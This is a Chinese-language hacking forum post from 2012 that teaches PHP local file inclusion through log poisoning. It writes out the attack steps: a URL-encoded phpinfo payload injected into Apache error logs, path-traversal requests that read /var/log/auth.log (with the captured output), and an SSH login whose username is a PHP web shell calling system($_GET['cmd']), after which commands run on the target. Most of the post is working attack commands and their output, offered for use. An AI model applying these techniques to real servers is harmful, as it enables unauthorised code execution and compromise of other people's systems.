切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
241 PHP文件包含漏洞 日志[复制链接]
发表于 2012-8-29 01:46:13 | 显示全部楼层 |!read_mode!
一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读
我们可以包含日志



  1. 在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交

  2. http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E

  3. 这样肯定会报出错找不到页面,而一出错就被记在错误日志里了

  4. http://xxx.com/z.php?zizzy=/home/user/www.xxx.com/logs/www-error_log

  5. 这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
  6. --------------------

  7. 另外的包含假设SSH日志可读 如果你的HTTPD能读当前的SSH日志:
复制代码
  1. root@ubuntu:/var/log# chmod 777 auth.log
复制代码
包含他


  1. root@Dis9Team:~# GET http://5.5.5.2/lif.php?file=../../../var/log/auth.log | head
  2. Aug  2 18:55:44 ubuntu sshd[812]: Server listening on 0.0.0.0 port 22.
  3. Aug  2 18:55:44 ubuntu sshd[812]: Server listening on :: port 22.
  4. Aug  2 18:55:55 ubuntu login[888]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/tty1 ruser= rhost=  user=brk
  5. Aug  2 18:55:59 ubuntu login[888]: FAILED LOGIN (1) on '/dev/tty1' FOR 'brk', Authentication failure
  6. Aug  2 18:56:04 ubuntu login[888]: pam_sm_authenticate: Called
  7. Aug  2 18:56:04 ubuntu login[888]: pam_sm_authenticate: username = [brk]
  8. Aug  2 18:56:04 ubuntu login[890]: Passphrase file wrapped
  9. Aug  2 18:56:05 ubuntu login[888]: pam_unix(login:session): session opened for user brk by LOGIN(uid=0)
  10. Aug  2 18:56:15 ubuntu sudo:      brk : TTY=tty1 ; PWD=/home/brk ; USER=root ; COMMAND=/usr/bin/passwd root
  11. Aug  2 18:56:15 ubuntu passwd[945]: eCryptfs PAM passphrase change module retrieved a NULL passphrase; nothing to do
  12. root@Dis9Team:~#
复制代码
能写入SSH


  1. root@Dis9Team:~# ssh '<pre><?echo system($_GET['cmd']); exit;?>'@5.5.5.2
  2. <pre><?echo system($_GET[cmd])@5.5.5.2's password:
复制代码
成功写入 http://5.5.5.2/lif.php?file=../. ... id;pwd;ls%20-la%20/




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-11-26 03:07

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部